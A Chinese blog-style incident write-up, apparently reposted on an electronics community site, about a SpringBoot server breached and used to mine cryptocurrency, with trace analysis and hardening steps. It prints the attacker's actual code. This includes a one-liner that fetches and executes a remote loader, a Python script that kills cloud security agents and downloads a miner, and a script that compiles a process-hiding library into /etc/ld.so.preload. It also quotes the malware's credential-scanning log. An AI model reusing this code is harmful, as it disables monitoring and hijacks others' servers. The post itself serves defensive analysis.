0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

服务器被入侵挖矿的过程与解决方法

Android编程精选 来源:itlanyan.com 作者:tlanyan 2022-07-22 16:47 次阅读
常在河边走,哪能不湿鞋。自认为安全防范意识不错,没想到服务器被入侵挖矿的事情也能落到自己头上。本文简要记录发现服务器被入侵挖矿的过程,同时分析木马的痕迹和信息,最后给出解决方法。

服务器被入侵挖矿过程

事情经过

昨天是周六,睡得比较晚。玩手机时忽然收到阿里云短信和邮件提醒,服务器有异常行为:

0021ccc8-0758-11ed-ba43-dac502259ad0.png

一看邮件内容就知道不得了,赶紧打开电脑处理。首先用 netstat 命令查看端口,发现一个异常的端口,但不显示程序名。这时心里已经很清楚,服务器上的Java程序被远程执行代码(RCE),也许还被植入了 rootkit。

首要问题是保障业务正常可用,于是快速拉起另外一个实例,将业务迁移过去。接下来, 首先将被入侵服务器关机,然后一步步研究入侵过程,以及其在服务器上的行为。

入侵行为分析

根据邮件内容,一个 SpringBoot 应用被 getshell 并被执行远程代码。被执行的代码语句 base64 解码后为:

	
python -c 'import urllib;exec urllib.urlopen("http://m.windowsupdatesupport.org/d/loader.py").read()
将其下载,内容如下:
import sysimport osfrom os.path import expanduserver=sys.version
shs='''ps aux | grep -v grep | grep 'aegis' | awk '{print $11}' | xargs  dirname  | xargs  rm -rfps aux | grep -v grep | grep 'hids' | awk '{print $11}' | xargs  dirname  | xargs  rm -rfps aux | grep -v grep | grep 'cloudwalker' | awk '{print $11}' | xargs  dirname  | xargs  rm -rfps aux | grep -v grep | grep 'titanagent' | awk '{print $11}' | xargs  dirname  | xargs  rm -rfps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'hids' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'titanagent' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'sgagent' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'barad_agent' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'hostguard' | awk '{print $2}' | xargs  -I {}  kill -9 {}
rm -rf /usr/local/aegisrm -rf /usr/local/qcloudrm -rf /usr/local/hostguard/bin
ps aux | grep -v grep | grep 'kworkers' | awk '{print $2}' | xargs  -I {}  kill -9 {}
'''os.system(shs)domainroota="m.windowsupdatesupport.org"#domainroota="192.168.67.131"#$domainroota#curl  http://$domainroota/d/kworkers -o $gitdir/kworkershomedir=expanduser("~")gitdir=""try:    os.mkdir(homedir+"/.git")except Exception as e:    print(e)if os.path.isdir(homedir+"/.git"):    gitdir=homedir+"/.git"try:    os.mkdir("./.git")except Exception as e:    print(e)if os.path.isdir("./.git"):    gitdir="./.git"downloadu="http://{}/d/kworkers".format(domainroota)if ver.startswith("3"):    import urllib.request    with urllib.request.urlopen(downloadu) as f:        html = f.read()        open(gitdir + "/kworkers", 'wb').write(html)else:    import urllib2    with open(gitdir + "/kworkers", 'wb') as f:        f.write(urllib2.urlopen("http://{}/d/kworkers".format(domainroota)).read())        f.close()print ("Download Complete!")os.system("chmod 777 "+gitdir+"/kworkers")if os.path.isfile('/.dockerenv'):    os.system(gitdir+"/kworkers")else:    os.system("nohup {}/kworkers >>{}/.log&".format(gitdir,gitdir))

远程代码主要做了这些事情:

  1. 卸载服务器上的安全监控工具;事后开机,发现阿里云盾果然被卸载了
  2. 关掉所有kworkers进程;
  3. 在当前目录下创建 .git 目录,下载并执行 kworkers 程序。

上网搜了一下 kworkers,发现是挖矿应用,并非加密勒索等木马,心里稍微安心一点。通过阿里云后台监控,可以看到木马入侵后,短时间内cpu占用率飙升(本人处理及时,木马挖矿时间大概持续5分钟左右):

002fd930-0758-11ed-ba43-dac502259ad0.png

服务器残留痕迹

大概知道了木马的行为,接着重启服务器,查看服务器上的痕迹。1、查看有无添加定时任务:

	
# crontab -l0 2 * * * /xxx/.git/kworkers
木马添加了定时启动任务。2、进入木马主目录,发现下载了如下文件:

003e80ac-0758-11ed-ba43-dac502259ad0.png

此外,上层目录和家目录还多了 cert_key.pemcert.pem 两个文件,分别存放公钥和密钥。3、查看木马留下的日志,有如下内容:
/xxx/.git/xxx/.gitworking dir /xxx from pid 23684version not exist downloadDownloaded: http://m.windowsupdatesupport.org/d/downloadversion not exist dbusDownloaded: http://m.windowsupdatesupport.org/d/dbusversion not exist hideproc.shDownloaded: http://m.windowsupdatesupport.org/d/hideproc.sherror exit status 1version not exist sshkey.shDownloaded: http://m.windowsupdatesupport.org/d/sshkey.shversion not exist autoupdateDownloaded: http://m.windowsupdatesupport.org/d/autoupdateversion not exist kworkersKey path not found/xxx/.gitpassfound  protectedpassfound  providedpassfound  +clientpassfound  +clientpassfound  protectedpassfound  providedpassfound  qualitypassfound  (pluspassfound  (digits,passfound  promptfound aksk xxxx xxxxfound aksk xxxx xxxxpassfound  xxxpassfound  xxxpassfound  xxxpassfound  xxxpassfound  xxxpassfound  xxxlstat /proc/7776/fd/3: no such file or directorylstat /proc/7776/fdinfo/3: no such file or directorylstat /proc/7776/task/7776/fd/3: no such file or directorylstat /proc/7776/task/7776/fdinfo/3: no such file or directorylstat /proc/7776/task/7777/fd/3: no such file or directorylstat /proc/7776/task/7777/fdinfo/3: no such file or directorylstat /proc/7776/task/7778/fd/3: no such file or directorylstat /proc/7776/task/7778/fdinfo/3: no such file or directorylstat /proc/7776/task/7779/fd/3: no such file or directorylstat /proc/7776/task/7779/fdinfo/3: no such file or directorylstat /proc/7776/task/7780/fd/3: no such file or directorylstat /proc/7776/task/7780/fdinfo/3: no such file or directorylstat /proc/7776/task/7781/fd/3: no such file or directorylstat /proc/7776/task/7781/fdinfo/3: no such file or directorylstat /proc/7776/task/7782/fd/3: no such file or directorylstat /proc/7776/task/7782/fdinfo/3: no such file or directorylstat /proc/7776/task/7783/fd/3: no such file or directorylstat /proc/7776/task/7783/fdinfo/3: no such file or directoryrestart cmd  /xxx/.git/kworkers/xxx/.gitpassfound  file,passfound  settingspassfound  file.passfound  callbackspassfound  Callbackpassfound  examplepassfound  promptpassfound  passwordpassfound  informationpassfound  tokenpassfound  tokenpassfound  tokenpassfound  Passwordpassfound  passwordpassfound  passwordpassfound  -basedpassfound  Passwordpassfound  (usingpassfound  field>passfound  retrypassfound  foobarpassfound  foobarpassfound  foobarpassfound  foobarpassfound  foobarpassfound  passwordpassfound  passwordpassfound  foobarpassfound  foobarpassfound  secretrtotal passwords 25xxx.xxx.xxx.xxxlan ipdoscan range  xxx.xxx.0.0/16ping...Receive 24 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 time=496.309µsworking dir /xxx from pid 7792Receive 24 bytes from xxx.xxx.xxx: icmp_seq=0 time=257.973µsxxx.xxx.xxx is alivexxx.xxx.xxx is alivexxx.xxx.xxx:80  openxxx.xxx0xxx:443  openversion  same downloadversion  same dbusrestart dbusexec again dbus downrunkill process pid 23709
process completedversion  same hideproc.shskip restart hideproc.shversion  same sshkey.shskip restart sshkey.shversion  same autoupdateskip restart autoupdateversion  same kworkersKey path not found
根据日志,主要是下载程序,检测用户名和密码,探测内网,然后启动自动更新、隐藏进程等程序。
  1. hideproc.sh 感兴趣,其内容为:

	
if [ "$EUID" -ne 0 ]  then echo "Please run as root"else  if [ `grep libc2.28 /etc/ld.so.preload`  ]  then echo "hideproc already done!!"  else    apt-get update -y    apt-get install build-essential -y    yum check-update    yum install build-essential -y    dnf groupinstall "Development Tools" -y    yum group install "Development Tools"  -y    curl http://m.windowsupdatesupport.org/d/processhider.c -o  processhider.c
    gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl    mv libc2.28.so /usr/local/lib/ -f    grep libc2.28 /etc/ld.so.preload  || echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload    rm -f processhider.c    ls >/tmp/.1  2>&1    grep libc2.28.so /tmp/.1 && echo >/etc/ld.so.preload  fifi
其首先检测是否root用户,然后编译libc2共享库,注入隐藏进程的代码。这应该是用netstat无法查看到进程名的原因。5、查看访问日志,发现期间有个IP对服务器进行爆破:

006a9020-0758-11ed-ba43-dac502259ad0.png

其他信息

除了上述文件,/tmp文件夹下还生成了.1和.1.sh文件;

查询可疑ip,位于国内北京市,应该是肉鸡;

查询木马下载域名windowsupdatesupport.org,今年6月注册,解析ip都在国外。该域名很有混淆性,并且为了方便直接用http访问;

除了下载木马文件挖矿,未改变服务器上的其他数据。

服务器被入侵挖矿解决办法

虽然知道是 SpringBoot 应用触发了 RCE,但遗憾目前仍未找到是哪个包导致的漏洞。目前采取的缓解措施为:1、被入侵服务器重装系统;
2、使用非 root 用户启动 SpringBoot 应用;
3、被入侵的是子系统,增加基本授权:

	
apt install -y apache2-utilshtpasswd /etc/nginx/conf.d/.htpasswd user

然后配置 Nginx 使用认证信息:


	
server {  ...  auth_basic  "子系统鉴权:";  auth_basic_user_file /etc/nginx/conf.d/.htpasswd;  ..}

4、防火墙限制对外连接。

上述错误能一定程度上避免类似情况再次发生,但找到应用程序中的漏洞才是接下来的重点。

总结

幸运的是这次来的是挖矿木马,服务器上的程序和数据都未受影响。也很感谢阿里云免费的安全提醒,让我在第一时间处理。

但这次事故也敲醒了警钟:

  1. 不要随意用 root 权限运行程序;
  2. 防火墙权限要严格收紧;
  3. 做好安全监控;
  4. 时刻做好数据备份。

审核编辑:汤梓红


声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • 服务器
    +关注

    关注

    12

    文章

    9010

    浏览量

    85162
  • 木马
    +关注

    关注

    0

    文章

    47

    浏览量

    13320
  • 阿里云
    +关注

    关注

    3

    文章

    940

    浏览量

    42955
  • 挖矿
    +关注

    关注

    6

    文章

    448

    浏览量

    16028

原文标题:记一次服务器被入侵,没想到我轻松搞定了它~

文章出处:【微信号:AndroidPush,微信公众号:Android编程精选】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    服务器远程不上服务器怎么办?服务器无法远程的原因是什么?

    产生问题的原因,检查硬盘和服务器系统。通过日志和检查数据来确认问题出 现的原因以及如何解决。 三、端口问题 1.端口错误 找回正确的端口或更换远程端口 2.端口扫爆 更改端口,并在防火墙禁止扫爆的IP
    发表于 02-27 16:21

    服务器超出了连接范围的解决方法

    服务器超出了连接范围的解决方法终端服务器超出了最大允许连接解决方法使用远程桌面链接登录到终端服务器时经常会遇到“终端
    发表于 01-06 22:59

    服务器植入挖矿病毒解决办法

    服务器植入挖矿病毒解决办法上午重启服务的时候,发现程序启动死慢,用top命令查看了一下,cpu被占用接近100%,所以无法运行新程序,通过top命令然后输入P,就能看到有两个程序几乎
    发表于 08-28 15:50

    TCP服务器创建过程

    (UCOSIII版本)的基础上进行修改,实现多客户端连接的一个方法。1、TCP服务器创建过程建立一个TCP服务器需要经过创建连接conn=netconn_new(NETCONN_TCP
    发表于 08-24 08:03

    入侵服务器的症状分析与应对方法

    本指南中所谓的服务器入侵或者说被黑了的意思,是指未经授权的人或程序为了自己的目的登录到服务器上去并使用其计算资源,通常会产生不好的影响。
    的头像 发表于 12-25 10:26 3777次阅读

    服务器可以挖矿吗_云服务器怎么挖矿

    本文对云服务器的定义、对云服务器优势进行了详细分析。最后详细的介绍使用云服务器挖比特币的教程。
    发表于 01-08 17:19 3w次阅读
    云<b class='flag-5'>服务器</b>可以<b class='flag-5'>挖矿</b>吗_云<b class='flag-5'>服务器</b>怎么<b class='flag-5'>挖矿</b>

    解析Linux如何判断自己的服务器是否入侵的检测方法

    如何判断自己的服务器是否入侵了呢?仅仅靠两只手是不够的,但两只手也能起到一些作用,我们先来看看UNIX系统上一些入侵检测方法,以LINUX
    的头像 发表于 01-13 10:27 5982次阅读

    网络诊断提示DNS服务器未响应解决方法

    本文主要介绍了网络诊断提示DNS服务器未响应解决方法。DNS服务器是由域名解析和域名服务器组成的。域名
    发表于 01-14 09:37 6w次阅读
    网络诊断提示DNS<b class='flag-5'>服务器</b>未响应<b class='flag-5'>解决方法</b>

    win7dns服务器异常原因及解决方法

    本文主要介绍了win7 dns服务器异常原因及解决方法。在浏览网页的过程中经常出现无法显示此网页、找不到服务器或DNS错误,那么我们遇到网页提示找不到
    发表于 01-14 09:59 3.8w次阅读
    win7dns<b class='flag-5'>服务器</b>异常原因及<b class='flag-5'>解决方法</b>

    串口服务器的常见问题及解决方法

    串口服务器因为其功能的原因,如今在工控领域有着非常广泛的应用,在实际使用串口服务器过程中也会遇到一些问题。下面为大家介绍几个在使用串口服务器时经常会遇到的问题及
    发表于 06-16 16:01 3046次阅读

    Linux服务器入侵导致冻结的过程

    来自:看雪论坛,作者:Hefe https://bbs.pediy.com/thread-225163.htm 不一会运维的同事也到了,气喘吁吁的说:我们有台服务器阿里云冻结了,理由:对外恶意发包
    的头像 发表于 09-01 16:11 3184次阅读

    独立服务器异常问题及解决方法

    的含义。然而,因为独立服务器在日常使用的过程中,由于其硬件的复杂性和不间端性,经常会出现很多问题困扰这我们。下面我们就简单的来说一下独立服务器异常的情况和解决措施。
    的头像 发表于 05-05 15:14 606次阅读

    FTP连接重置问题的解决方法与技巧!FTP服务器连接修复!

    FTP连接重置问题的解决方法与技巧!FTP服务器连接修复! FTP(文件传输协议)是用于在计算机网络环境中进行文件传输的常用协议。然而,有时我们可能会遇到FTP连接重置的问题,这会
    的头像 发表于 01-12 16:00 9815次阅读

    服务器入侵现象、排查和处理步骤

    近期有一个朋友的服务器(自己做了网站)好像遭遇了入侵,具体现象是: 服务器 CPU 资源长期 100%,负载较高。 服务器上面的服务不能正常
    发表于 03-22 10:56 1037次阅读
    <b class='flag-5'>服务器</b><b class='flag-5'>入侵</b>现象、排查和处理步骤

    服务器错误是怎么回事?常见错误原因及解决方法汇总

    服务器错误是怎么回事?最常见的原因分有六个,分别是:硬件问题、软件问题、网络问题、资源耗尽、数据库、文件权限问题。可以根据以下具体错误原因进行辨别,并选择适合的解决方法。关于常见服务器原因及
    的头像 发表于 08-12 10:11 1283次阅读